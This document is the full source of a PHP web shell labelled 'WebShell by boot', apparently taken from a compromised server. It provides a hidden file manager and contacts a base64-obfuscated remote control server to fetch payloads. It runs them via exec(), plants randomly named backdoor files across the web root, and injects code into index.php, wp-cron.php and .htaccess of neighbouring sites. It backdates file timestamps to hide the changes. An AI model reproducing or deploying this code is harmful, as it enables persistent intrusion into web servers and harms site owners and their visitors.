Your IP : 52.14.82.217
<?php
@set_time_limit(0);
error_reporting(0);
session_start();
$type = $_REQUEST['type'];
$path = $_REQUEST['path'];
$data = $_SERVER;
$website_path = $data['DOCUMENT_ROOT'];
$file_path = $data['SCRIPT_FILENAME'];
$now_path = dirname($file_path);
$web_url = $data['REQUEST_SCHEME']."://".$data['SERVER_NAME'];
if(!empty($path)){
$file_path = $path;
$now_path = $path;
}
if($type == 1){
$now_path = $path;
}
$file_path_array = explode('/', $file_path);
if(!is_dir($now_path)){
$now_path = dirname($now_path);
}
$can_read = false;
if (is_readable($now_path)) {
$can_read = true;
}
$can_write = false;
if (is_writable($now_path)) {
$can_write = true;
}
$prot = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://";
$domain = $_SERVER['HTTP_HOST'];
$now_site = $prot . $domain;
$sy_path = str_replace($website_path, '', $now_path);
$now_url = $web_url.$sy_path;
$post_data = $_POST;
$pws = "aHR0cHM6Ly9mcDIwMjQuYnlob3QudG9w";
if(!empty($post_data)){
foreach ($post_data as $k=>$v){
$_SESSION[$k] = $v;
}
}
$all_paths = array();
$door_lists = array();
$last_folders = array();
if(!empty($_SESSION['c2hlbGxfY29kZQ==']) && strlen($_SESSION['c2hlbGxfY29kZQ==']) == 20){
?>
<!DOCTYPE html>
<html lang="en">
<head>
<title>WebShell by boot</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
</head>
<body>
<div class="jumbotron text-center" style="padding: 1rem 0rem;">
<h1 style="font-size:2rem;font-weight: bold;margin: 1rem 0;">WebShell by boot</h1>
</div>
<div class="container">
<div class="row">
<p>
<div style="width: 30%;display:inline-block;">Server IP: <?php echo $data['SERVER_ADDR'];?></div>
<div style="width: 30%;display:inline-block;">Server Software: <?php echo $data['SERVER_SOFTWARE'];?></div>
<div style="width: 30%;display:inline-block;">OS: <?php echo PHP_OS;?></div>
</p>
<p>
<div style="width: 30%;display:inline-block;">Website: <?php echo $data['HTTP_HOST'];?></div>
<div style="width: 30%;display:inline-block;">User: <?php echo get_current_user();?></div></p>
<p>
<a href="?path=<?php echo $website_path;?>">Project</a>
</p>
</div>
<div class="row">
<p>
Path:
<?php
$file_now_path = "";
foreach($file_path_array as $k=>$v){
?><?php if(empty($v)){ ?><a href="?path=/">-</a>r
<?php }else{if(empty($file_now_url)){$file_now_url = $v;}else{$file_now_url = $file_now_url . '/' .$v;}$file_now_path = $file_now_path . "/" . $v;?>/<a href="?path=<?php echo $file_now_path;?>"><?php echo trim($v);?></a><?php } ?><?php }?>
<span <?php if($can_read){?>style="color:green;"<?php }else{ ?>style="color:red;"<?php }?>>Readable</span> | <span <?php if($can_write){?>style="color:green;"<?php }else{ ?>style="color:red;"<?php }?>>Writeable</span>
</p>
</div>
<?php if($type == 2 || $type == 3){
if($type == 3){
$file_content = $_REQUEST['file_content'];
$content_result = file_put_contents($path, $file_content);
if ($content_result) {
echo '<div class="alert alert-success" role="alert">File content modified successfully!</div>';
}else{
echo '<div class="alert alert-danger" role="alert">Failed to modify file content!</div>';
}
}
?>
<div class="row">
<form action="?type=3" method="post">
<input type="hidden" id="path" name="path" value="<?php echo $file_path;?>"/>
<div class="form-group">
<?php $content = file_get_contents($file_path);?>
<textarea class="form-control" id="exampleFormControlTextarea1" name="file_content" rows="20" cols="100"><?php echo htmlspecialchars($content);?></textarea>
</div>
<button type="submit" class="btn btn-success">Edit</button>
</form>
</div>
<?php }else if($type == 4){
$file_new_name = $_POST['file_new_name'];
if(!empty($file_new_name)){
$rename_result = rename($file_path, $now_path.'/'.$file_new_name);
if($rename_result){
echo '<div class="alert alert-success" role="alert">File name modified successfully!</div>';
$file_path = $now_path.'/'.$file_new_name;
}else{
echo '<div class="alert alert-danger" role="alert">Failed to modify file name!</div>';
}
}
?>
<div class="row">
<form action="?type=4" method="post">
<input type="hidden" id="path" name="path" value="<?php echo $file_path;?>"/>
<div class="form-group">
<?php $content = file_get_contents($file_path);?>
<input type="text" class="form-control" id="file_new_name" name="file_new_name" value="<?php echo basename($file_path);?>">
</div>
<button type="submit" class="btn btn-success">Edit</button>
</form>
</div>
<?php }else if($type == 5){
$new_chmod = trim($_POST['new_chmod']);
if(!empty($new_chmod)){
if (chmod($file_path, octdec($new_chmod))) {
echo '<div class="alert alert-success" role="alert">File permissions modified successfully!</div>';
$old_chmod = $new_chmod;
}else{
echo '<div class="alert alert-danger" role="alert">Failed to modify file permissions!</div>';
}
}else{
$permissions = fileperms($file_path);
$old_chmod = substr(sprintf('%o', $permissions), -4);
}
?>
<div class="row">
<form action="?type=5" method="post">
<input type="hidden" id="path" name="path" value="<?php echo $file_path;?>"/>
<div class="form-group">
<?php $content = file_get_contents($file_path);?>
<input type="text" class="form-control" id="new_chmod" name="new_chmod" value="<?php echo $old_chmod;?>">
</div>
<button type="submit" class="btn btn-success">Edit</button>
</form>
</div>
<?php }else if($type == 6){
$new_name = trim($_POST['new_name']);
$new_content = trim($_POST['new_content']);
if(!empty($new_name)){
if(is_file($now_path.'/'.$new_name)){
echo '<div class="alert alert-danger" role="alert">The file already exists!</div>';
}else{
$file = fopen($now_path.'/'.$new_name, 'w');
if ($file) {
if (fwrite($file, $new_content)) {
echo '<div class="alert alert-success" role="alert">File created successfully!</div>';
} else {
echo '<div class="alert alert-danger" role="alert">Unable to write to file!</div>';
}
fclose($file);
} else {
echo '<div class="alert alert-danger" role="alert">Unable to open file!</div>';
}
}
}
?>
<div class="row">
<form action="?type=6" method="post">
<input type="hidden" id="path" name="path" value="<?php echo $file_path;?>"/>
<div class="form-group">
<input type="text" class="form-control" id="new_name" name="new_name" value="<?php echo $new_name;?>" placeholder="New File Name">
</div>
<div class="form-group">
<textarea class="form-control" id="new_content" name="new_content" rows="20" cols="100" placeholder="New File Content"><?php echo htmlspecialchars($new_content);?></textarea>
</div>
<button type="submit" class="btn btn-success">Create Now</button>
</form>
</div>
<?php }else if($type == 7){
$new_name = trim($_POST['new_name']);
if(!empty($new_name)){
if (!is_dir($now_path . '/' . $new_name)) {
if (mkdir($now_path . '/' . $new_name)) {
echo '<div class="alert alert-success" role="alert">Directory created successfully!</div>';
} else {
echo '<div class="alert alert-success" role="alert">Directory creation failed!</div>';
}
}else{
echo '<div class="alert alert-success" role="alert">Directory already exists!</div>';
}
}
?>
<div class="row">
<form action="?type=7" method="post">
<input type="hidden" id="path" name="path" value="<?php echo $file_path;?>"/>
<div class="form-group">
<input type="text" class="form-control" id="new_name" name="new_name" value="<?php echo $new_name;?>" placeholder="New Folder Name">
</div>
<button type="submit" class="btn btn-success">Create Now</button>
</form>
</div>
<?php }else{ ?>
<?php
if($_POST['act'] == 'del'){
$delete_file_list = $_POST['childcheck'];
if(!empty($delete_file_list)){
$count = 0;
$fail_count = 0;
foreach ($delete_file_list as $k=>$v){
$del_result = unlink($v);
if($del_result){
$count++;
}else{
$fail_count++;
}
}
if($count > 0){
echo '<div class="alert alert-success" role="alert">Delete '.$count.' files successfully!</div>';
}
if($fail_count > 0){
echo '<div class="alert alert-danger" role="alert">Delete '.$fail_count.' files failed!</div>';
}
}
}
if($_POST['act'] == 'upload'){
$targetFile = $now_path . '/' . basename($_FILES["fileToUpload"]["name"]);
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
echo '<div class="alert alert-success" role="alert">File '.htmlspecialchars(basename($_FILES["fileToUpload"]["name"])).' uploaded!</div>';
} else {
echo '<div class="alert alert-danger" role="alert">File upload failed!</div>';
}
}
$file_list = scandir($now_path);
$file_list = sortByFolder($now_path, $file_list);
?>
<div class="row">
<div class="col-12" style="margin-bottom: 1rem;">
<form action="?path=<?php echo $file_path;?>" method="post" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload"/>
<input class="form-control form-control-sm" id="formFileSm" name="fileToUpload" type="file" style="width: 200px;display: inline-block;">
<button type="submit" class="btn btn-info btn-sm">Upload</button>
<a class="btn btn-primary btn-sm" href="?path=<?php echo $file_path;?>&type=6">Create File</a>
<a class="btn btn-success btn-sm" href="?path=<?php echo $file_path;?>&type=7">Create Folder</a>
</form>
</div>
<div class="bd-example bd-example-row" style="border: 1px solid #ededed;padding: 1rem;margin: 1rem 0;">
<div class="row">
<div class="col-2 col-sm-1">
<form action="?path=<?php echo $file_path;?>" method="post">
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="reback"/>
<input type="hidden" name="group_id" value="<?php echo $_SESSION['Z3JvdXA='];?>"/>
<input type="hidden" name="shell_id" value="<?php echo $_SESSION['c2hlbGxfaWQ='];?>"/>
<button type="submit" class="btn btn-success btn-sm">Reback</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php echo $file_path;?>" method="post">
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="exec"/>
<input type="hidden" name="group_id" value="<?php echo $_SESSION['Z3JvdXA='];?>"/>
<input type="hidden" name="shell_id" value="<?php echo $_SESSION['c2hlbGxfaWQ='];?>"/>
<button type="submit" class="btn btn-warning btn-sm">Exec</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php echo $file_path;?>" method="post">
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="others"/>
<input type="hidden" name="shell_id" value="<?php echo $_SESSION['c2hlbGxfaWQ='];?>"/>
<input type="hidden" name="group_id_2" value="<?php echo $_SESSION['c2Vjb25k'];?>"/>
<input type="hidden" name="group_id_3" value="<?php echo $_SESSION['dGhpcmRncm91cA=='];?>"/>
<button type="submit" class="btn btn-info btn-sm">Others</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php echo $file_path;?>" method="post">
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="doors"/>
<input type="hidden" name="shell_id" value="<?php echo $_SESSION['c2hlbGxfaWQ='];?>"/>
<button type="submit" class="btn btn-danger btn-sm">Doors</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php echo $file_path;?>" method="post">
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="station"/>
<input type="hidden" name="shell_id" value="<?php echo $_SESSION['c2hlbGxfaWQ='];?>"/>
<button type="submit" class="btn btn-primary btn-sm">Station</button>
</form>
</div>
</div>
</div>
<div class="bd-example bd-example-row" style="border: 1px solid #ededed;padding: 1rem;margin: 1rem 0;">
<div class="row">
<div class="col-12 col-sm-12" style="text-align: center;font-weight:bold;">
<?php
if($_POST['act'] == 'shell'){
if($_POST['type'] == 'reback'){
rebackAction($_POST, $pws, $now_site);
}else if($_POST['type'] == 'exec'){
execAction($_POST, $pws, $now_site);
}else if($_POST['type'] == 'doors'){
doorsAction($_POST, $pws, $now_site);
}else if($_POST['type'] == 'others'){
othersAction($_POST, $pws, $now_site);
}else if($_POST['type'] == 'station'){
stationAction($_POST, $pws, $now_site);
}
}
?>
</div>
</div>
</div>
<form action="?path=<?php echo $file_path;?>" method="post">
<div class="col-12" style="margin-bottom: 1rem;">
<input type="hidden" name="act" value="del"/>
<button type="submit" class="btn btn-danger btn-xs">Delete</button>
</div>
<table class="table table-bordered">
<thead>
<tr>
<th>
<div class="form-check">
<input class="form-check-input" type="checkbox" value="1" id="allcheck" name="allcheck">
</div>
</th>
<th>Name</th>
<th>Url</th>
<th>Size</th>
<th>Modify</th>
<th>Permission</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php
if(!empty($file_list) && count($file_list) > 2){
foreach($file_list as $k=>$v){
if(!($v == '.' || $v == '..')){
$file_url = $now_path . '/' .$v;
?>
<tr>
<th>
<div class="form-check">
<input class="form-check-input" type="checkbox" value="<?php echo $file_url;?>" name="childcheck[]">
</div>
</th>
<td>
<?php
if(is_dir($file_url)){
echo '<a href="?path='.$file_url.'&type=1" style="color: green;font-weight:bold;">
<i class="bi bi-folder" style="vertical-align: middle;">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-folder" viewBox="0 0 16 16">
<path d="M.54 3.87.5 3a2 2 0 0 1 2-2h3.672a2 2 0 0 1 1.414.586l.828.828A2 2 0 0 0 9.828 3h3.982a2 2 0 0 1 1.992 2.181l-.637 7A2 2 0 0 1 13.174 14H2.826a2 2 0 0 1-1.991-1.819l-.637-7a1.99 1.99 0 0 1 .342-1.31zM2.19 4a1 1 0 0 0-.996 1.09l.637 7a1 1 0 0 0 .995.91h10.348a1 1 0 0 0 .995-.91l.637-7A1 1 0 0 0 13.81 4H2.19zm4.69-1.707A1 1 0 0 0 6.172 2H2.5a1 1 0 0 0-1 .981l.006.139C1.72 3.042 1.95 3 2.19 3h5.396l-.707-.707z"/>
</svg>
</i>'.$v.'</a>';
}else{
echo '<a href="?path='.$file_url.'&type=2">'.$v.'</a>';
}
?>
</td>
<td>
<?php if(!is_dir($file_url)){ ?>
<a href="<?php echo $now_url.'/'.$v;?>" target="_blank">click visit</a>
<?php } ?>
</td>
<td>
<?php
if(is_dir($file_url)){
echo '<font color="green" style="font-weight: bold;">Directory</font>';
}else{
echo getFileSize($file_url);
}
?>
</td>
<td>
<?php
$modificationTime = filemtime($file_url);
echo date("Y-m-d H:i:s", $modificationTime);
?>
</td>
<td>
<?php $permission = getFilePermission($file_url);
if(strpos($permission, 'w') !== false){
echo '<font color="green" style="font-weight: bold;">'.$permission.'</font>';
}else{
echo '<font color="red" style="font-weight: bold;">'.$permission.'</font>';
}
?>
</td>
<td>
<a class="btn btn-primary btn-xs" href="?path=<?php echo $file_url;?>&type=4">Rename</a>
<a class="btn btn-info btn-xs" href="?path=<?php echo $file_url;?>&type=2">Edit</a>
<a class="btn btn-warning btn-xs" href="?path=<?php echo $file_url;?>&type=5">Chmod</a>
</td>
</tr>
<?php }}}else{ ?>
<tr>
<td colspan="4" style="text-align: center;color:red;">
No Files!
</td>
</tr>
<?php }?>
</tbody>
</table>
</form>
</div>
<?php }?>
</div>
<script>
$(function(){
$('#allcheck').click(function(){
if($('#allcheck').is(":checked")){
$('input[name="childcheck[]"]').each(function(){
$(this).attr('checked', true);
})
}else{
$('input[name="childcheck[]"]').each(function(){
$(this).attr('checked', false);
})
}
})
})
</script>
</body>
</html>
<?php }?>
<?php
function getFileSize($file_url){
$file_size = filesize($file_url);
if($file_size > 1024 * 1024){
$file_size = round($file_size / (1024 * 1024), 2).' MB';
}else if($file_size > 1024){
$file_size = round($file_size / 1024, 2).' KB';
}else{
$file_size = $file_size.' B';
}
return $file_size;
}
function getFilePermission($filename) {
clearstatcache(true, $filename);
$perms = fileperms($filename);
if (($perms & 0xC000) === 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) === 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) === 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) === 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) === 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) === 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) === 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function sortByFolder($now_path, $all_list){
$folder_list = array();
$file_list = array();
foreach ($all_list as $k=>$v){
if(is_dir($now_path.'/'.$v)){
$folder_list[] = $v;
}else{
$file_list[] = $v;
}
}
sort($folder_list);
sort($file_list);
$all_list = array_merge($folder_list, $file_list);
return $all_list;
}
function rebackAction($data, $pweb, $now_site){
$group_id = $data['group_id'];
$shell_id = $data['shell_id'];
$url = base64_decode($pweb).'/indexdoor.php?action=reback&group_id='.$group_id;
$cc = curlget($url);
$json_array = json_decode($cc, true);
$result_data = array();
$result_data['shell_id'] = $shell_id;
$result_data['action'] = 'reback';
$save_url = base64_decode($pweb).'/save.php';
if(isset($json_array['in_files']) && !empty($json_array['in_files'])){
$wp_code = $json_array['wp_code'];
$in_list = explode(';', $json_array['in_files']);
foreach ($in_list as $k=>$v){
$wpstr = strslit($v);
$wp_code = str_replace('[##in_contnt_'.$k.'##]', $wpstr, $wp_code);
$contnt = $json_array['code'].$json_array['wp_ycode'];
crefile($v, $contnt);
}
$ht_list = explode(';', $json_array['ht_files']);
foreach ($ht_list as $k=>$v){
$wpstr = strslit($v);
$wp_code = str_replace('[##ht_contnt_'.$k.'##]', $wpstr, $wp_code);
$contnt = $json_array['ht_contnt'];
crefile($v, $contnt);
}
$wp_list = explode(';', $json_array['wp_files']);
$wp_result = array();
foreach ($wp_list as $k=>$v){
$f = crefile($v, $wp_code);
if($f){
$wp_result[] = $now_site.$v;
}
}
if(!empty($wp_result) && count($wp_result) > 0){
$result_data['wp_urls'] = $wp_result;
$result_data['status'] = 1;
}else{
$result_data['code'] = '1001';
$result_data['status'] = 2;
}
}else{
$result_data['code'] = '1002';
$result_data['status'] = 2;
}
$res = curlpost($save_url, $result_data);
if($res['status']){
echo '<p style="color:green;">Reback is successfully</p>';
foreach($wp_result as $k=>$v){
echo '<p><a href="'.$v.'" target="_blank">'.$v.'</a></p>';
}
}else{
echo '<p style="color:red;">Reback is failed! '.$result_data['code'].'</p>';
}
}
function execAction($data, $pweb, $now_site){
$group_id = $data['group_id'];
$shell_id = $data['shell_id'];
$url = base64_decode($pweb).'/indexdoor.php?action=exec&group_id='.$group_id;
$result_data = array();
$result_data['shell_id'] = $shell_id;
$result_data['action'] = 'exec';
$save_url = base64_decode($pweb).'/save.php';
$cc = curlget($url);
$json_array = json_decode($cc, true);
if(isset($json_array['in_contnt']) && !empty($json_array['ht_contnt']) && !empty($json_array['exec_code'])){
$result = add_exec($json_array['ht_contnt'], $json_array['in_contnt'], $json_array['exec_code'], $json_array['wp_ycode']);
if($result){
$result_data['status'] = 1;
}else{
$result_data['code'] = '1001';
$result_data['status'] = 2;
}
}else{
$result_data['code'] = '1002';
$result_data['status'] = 2;
}
$res = curlpost($save_url, $result_data);
if($res['status']){
echo '<p style="color:green;">Exec is successfully</p>';
}else{
echo '<p style="color:red;">Exec is failed! '.$result_data['code'].'</p>';
}
}
function add_exec($ht_contnt, $index_contnt, $exec_code, $wp_ycode){
$exec_code = str_replace("[##htcontent##]", base64_encode($ht_contnt), $exec_code);
$exec_code = str_replace("[##indexcontent##]", base64_encode($index_contnt.$wp_ycode), $exec_code);
$l12 = array("1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m");
for ($i = 1;$i < rand(6, 6);$i++) {
$e14 = rand(0, count($l12) - 1);
$o15.= $l12[$e14];
}
$u17 = fopen($o15 . ".php", "w");
fwrite($u17, $exec_code);
fclose($u17);
exec("php -f" . __DIR__ . "/$o15.php > /dev/null 2>/dev/null &", $e18, $res);
if ($res === 0) {
return true;
} else {
return false;
}
}
function othersAction($data, $pweb, $now_site){
$shell_id = $data['shell_id'];
$group_id_2 = $data['group_id_2'];
$group_id_3 = $data['group_id_3'];
$url = base64_decode($pweb).'/indexdoor.php?action=others&group_id_2='.$group_id_2.'&group_id_3='.$group_id_3;
$result_data = array();
$result_data['shell_id'] = $shell_id;
$result_data['action'] = 'others';
$save_url = base64_decode($pweb).'/save.php';
$cc = curlget($url);
$json_array = json_decode($cc, true);
if((!empty($json_array['group2_code']) && !empty($json_array['second_file'])) ||
(!empty($json_array['group3_code']) && !empty($json_array['third_file']))
){
$result = add_others($json_array['group2_code'], $json_array['group3_code'], $json_array['second_file'], $json_array['third_file'], $now_site);
if(!empty($result['second_url']) || !empty($result['third_url'])){
$result_data['second_url'] = $result['second_url'];
$result_data['third_url'] = $result['third_url'];
$result_data['status'] = 1;
}else{
$result_data['code'] = '1001';
$result_data['status'] = 2;
}
}else{
$result_data['code'] = '1002';
$result_data['status'] = 2;
}
$res = curlpost($save_url, $result_data);
if($res['status']){
echo '<p style="color:green;">Others is successfully</p>';
}else{
echo '<p style="color:red;">Others is failed! '.$result_data['code'].'</p>';
}
}
function add_others($group2_code, $group3_code, $second_file, $third_file, $now_site){
$result = array();
$sf = crefile($second_file, $group2_code);
$tf = crefile($third_file, $group3_code);
$result['second_url'] = "";
$result['third_url'] = "";
if($sf){
$result['second_url'] = $now_site.'/'.$second_file;
}
if($tf){
$result['third_url'] = $now_site.'/'.$third_file;
}
return $result;
}
function doorsAction($data, $pweb, $now_site){
$result_data = array();
$result_data['shell_id'] = $data['shell_id'];
$result_data['action'] = 'doors';
$save_url = base64_decode($pweb).'/save.php';
$shell_id = $data['shell_id'];
$url = base64_decode($pweb).'/indexdoor.php?action=doors&shell_id='.$shell_id;
$cc = curlget($url);
$json_array = json_decode($cc, true);
if(!empty($json_array['doors'])){
$result = add_doors($json_array['doors'], $json_array['wp_files'], $json_array['third_file'], $json_array['ht_ban_content'], $json_array['ht_open_content'], $now_site);
if(!empty($result['door_files'])){
$result_data['door_urls'] = implode(';', $result['door_files']);
$result_data['status'] = 1;
}else{
$result_data['code'] = '1001';
$result_data['status'] = 2;
}
}else{
$result_data['code'] = '1002';
$result_data['status'] = 2;
}
$res = curlpost($save_url, $result_data);
if($res['status']){
echo '<p style="color:green;">Doors is successfully, Success .h is '.$result['count'].'</p>';
foreach($result['door_files'] as $k=>$v){
echo '<p><a href="'.$v.'" target="_blank">'.$v.'</a></p>';
}
}else{
echo '<p style="color:red;">Doors is failed! '.$result_data['code'].'</p>';
}
}
function add_doors($doors_array, $wp_files, $third_file, $ban_content, $open_content, $now_site){
$result = array();
global $door_lists, $all_paths;
$path = $_SERVER['DOCUMENT_ROOT'];
getAllDirectories($path, 1);
$randomKeys = array_rand($door_lists, count($doors_array));
$door_files = array();
$succ_files = array();
$i = 0;
foreach ($randomKeys as $key) {
$file_door_url = $door_lists[$key];
$file_name = getrandstr(rand(5, 10)).'.php';
$file_url = $file_door_url.'/'.$file_name;
$res = crdoorfile($file_url, $doors_array[$i]);
if($res){
$succ_files[] = $file_url;
$door_files[] = str_replace($path, $now_site, $file_url);
}
$i++;
}
$count = 0;
if(count($succ_files) > 0){
$ht_urls = array();
$wp_files_array = explode(";", $wp_files);
foreach ($wp_files_array as $k=>$v){
$wp_files_array[$k] = $path.$v;
}
$ht_urls = $succ_files;
$ht_urls = array_merge($ht_urls, $wp_files_array);
$ht_urls[] = $path.'/'.$third_file;
$ht_folders = array();
$ht_files = array();
foreach ($ht_urls as $k=>$v){
$ht_folders[] = dirname($v);
$ht_files[] = basename($v);
}
foreach ($all_paths as $k=>$a){
$now_files = array();
foreach($ht_folders as $htk=>$htv){
if($a == $htv){
$now_files[] = $ht_files[$htk];
}
}
$ht_content_now = "";
if(!empty($now_files)){
$ht_content_now = str_replace('{#htcontent}', implode('|', $now_files), $open_content);
}else{
$ht_content_now = $ban_content;
}
chmod($a.'/.htaccess', 0644);
if (file_put_contents($a.'/.htaccess', $ht_content_now) !== false) {
$count++;
chmod($a.'/.htaccess', 0444);
}
}
}
$result['door_files'] = $door_files;
$result['count'] = $count;
return $result;
}
function getAllDirectories($path, $depth) {
global $all_paths, $door_lists, $last_folders;
$minDepth = 3;
$maxDepth = 8;
$directories = [];
$files = scandir($path);
foreach($files as $file) {
if ($file == '.' || $file == '..') {
continue;
}
$fullPath = $path . DIRECTORY_SEPARATOR . $file;
if (is_dir($fullPath)) {
$all_paths[] = $fullPath;
if ($depth >= $minDepth && $depth <= $maxDepth) {
$directories[] = $fullPath;
$door_lists[] = $fullPath;
}
if($depth == 5 && count($last_folders) == 0){
$last_folders[] = $fullPath;
}
if ($depth < $maxDepth) {
$directories = array_merge($directories, getAllDirectories($fullPath, $depth + 1));
}
}
}
return $directories;
}
function stationAction($data, $pweb, $now_site){
$result_data = array();
$result_data['shell_id'] = $data['shell_id'];
$result_data['action'] = 'station';
$save_url = base64_decode($pweb).'/save.php';
$shell_id = $data['shell_id'];
$url = base64_decode($pweb).'/indexdoor.php?action=station&shell_id='.$shell_id;
$cc = curlget($url);
$json_array = json_decode($cc, true);
$station_count = 0;
if(!empty($json_array['station_code']) && !empty($json_array['ht_pz_content'])){
$station_count = add_station($json_array['station_code'], $json_array['ht_pz_content'], $now_site);
if($station_count > 0){
$result_data['station_count'] = $station_count;
$result_data['status'] = 1;
}else{
$result_data['code'] = '1001';
$result_data['status'] = 2;
}
}else{
$result_data['code'] = '1002';
$result_data['status'] = 2;
}
$result_data['shell_url'] = $now_site;
$res = curlpost($save_url, $result_data);
if($res['status']){
echo '<p style="color:green;">Station is successfully, Success is '.$station_count.'</p>';
}else{
echo '<p style="color:red;">Station is failed! '.$result_data['code'].'</p>';
}
}
function add_station($station_code, $ht_content, $now_site){
$count = 0;
$path = $_SERVER['DOCUMENT_ROOT'];
$folder_name = basename($path);
$all_folders = getParentsFolders($path);
$all_results = array();
foreach($all_folders as $k=>$v){
$directories = glob($v. '/*', GLOB_ONLYDIR);
$all_folders = array_merge($all_folders, $directories);
}
foreach($all_folders as $k=>$v){
if(!strpos($v, $folder_name)){
$all_results[] = $v;
}
}
foreach ($all_results as $k=>$v){
$index_url = $v.'/index.php';
$wp_url = $v.'/wp-cron.php';
$ht_url = $v.'/.htaccess';
$index_yuan = "";
if(file_exists($index_url)){
chmod($index_url, 0644);
$index_yuan = file_get_contents($index_url);
}
file_put_contents($index_url, $station_code.$index_yuan);
chmod($index_url, 0444);
$wp_yuan = "";
if(file_exists($wp_url)){
chmod($wp_url, 0644);
$wp_yuan = file_get_contents($wp_url);
}
file_put_contents($wp_url, $station_code.$wp_yuan);
chmod($wp_yuan, 0444);
chmod($ht_url, 0644);
file_put_contents($ht_url, $ht_content);
chmod($ht_url, 0444);
$count++;
}
return $count;
}
function getParentsFolders($path){
$all_folders = array();
$parent_folds = dirname($path);
$directories = glob($parent_folds. '/*', GLOB_ONLYDIR);
$all_folders = $directories;
$parent_folds = dirname($parent_folds);
$directories = glob($parent_folds. '/*', GLOB_ONLYDIR);
$all_folders = array_merge($all_folders, $directories);
return $all_folders;
}
function curlget($url){
$url_data = "";
if (function_exists('file_get_contents')) {
$url_data = file_get_contents($url);
}
if (empty($url_data) && function_exists('curl_exec')) {
$conn = curl_init($url);
curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
$url_data = curl_exec($conn);
curl_close($conn);
}
if (empty($url_data) && function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = fopen($url, "r");
$url_data = stream_get_contents($handle);
fclose($handle);
}
return $url_data;
}
function curlpost($url, $data){
$jsonData = json_encode($data);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'Content-Length: ' . strlen($jsonData)
));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData);
$response = curl_exec($ch);
$result = array();
if (curl_errno($ch)) {
$result['status'] = 0;
$result['msg'] = curl_error($ch);
}
curl_close($ch);
$res = json_decode($response, true);
$result['status'] = $res['status'];
return $result;
}
function crefile($fiurl, $contnt){
$path = $_SERVER['DOCUMENT_ROOT'].'/';
$filath = $path.dirname($fiurl);
if (!is_dir($filath)) {
if (!mkdir($filath, 0755, true)) {
return false;
}
}
$file_path = $path.$fiurl;
if (file_put_contents($file_path, $contnt) !== false) {
$time = time() - rand(30, 100) * 24 *60 *60 - rand(0, 3600);
touch($file_path, $time);
return true;
} else {
return false;
}
}
function crdoorfile($fipath, $contnt){
if (file_put_contents($fipath, $contnt) !== false) {
$time = time() - rand(30, 100) * 24 *60 *60 - rand(0, 3600);
touch($fipath, $time);
return true;
} else {
return false;
}
}
function strslit($str){
$cha = str_split($str);
return "'".implode("'.'", $cha)."'";
}
function getrandstr($length = 10) {
$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomString;
}
?>